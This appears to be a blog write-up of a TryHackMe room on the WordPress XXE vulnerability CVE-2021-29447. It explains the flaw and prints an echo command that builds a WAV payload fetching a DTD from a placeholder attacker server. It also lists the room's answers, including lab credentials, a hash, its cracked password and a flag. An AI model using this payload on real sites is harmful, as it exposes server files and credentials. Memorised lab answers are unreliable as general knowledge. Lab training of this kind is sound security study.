We covered a wordpress XXE vulnerability CVE-2021-29447 that allows for sensitive files disclosure and server-side request forgery (SSRF). We exploited this WordPress vulnerability by generating WAV payload and uploading it to the compromised WordPress website. This was part of TryHackMe WordPress: CVE-2021-29447 Room.

OSCP Study Notes

Splunk SIEM Full Course with Practical Scenarios

Highlights

What is XXE vulnerability

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.

WordPress CVE-2021-29447 Impact

  • Arbitrary File Disclosure: The contents of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
  • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

Creating The Payload

You can create a WAV payload using the the commands shown below

nano poc.wav
# create a wav file
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
# paste the payload using echo, change the ip and port to match yours

References

  • WordPress 5.7 – ‘Media Library’ XML External Entity Injection (XXE) (Authenticated): Exploit-DB
  • WordPress 5.6-5.7 – Authenticated (Author+) XXE (CVE-2021-29447): Github
  • WordPress 5.6-5.7 – Authenticated XXE Within the Media Library Affecting PHP 8: wpscan

Room Answers

Based on the results of #1, what is the name of the database for WordPress?

wordpressdb2

Based on the results of #1, what are the credentials you found?

example: user:password

thedarktangent:sUp3rS3cret132

Enumerate and identify what is the dbms installed on the server?

MySQL

Based on the results of #4, what is the dbms version installed on the server?

5.7.33

Based on the results of #4, what port is the dbms running on?

3306

Compromise the dbms, What is the encrypted password located in the wordpress  users table with id 1??

$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1

Based on the results of #7, What is the password in plaint text?

teddybear

Compromise the machine and locate flag.txt

thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c72}

Video Walkthrough

, , , , ,
Show Comments

Motasem

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.

View Articles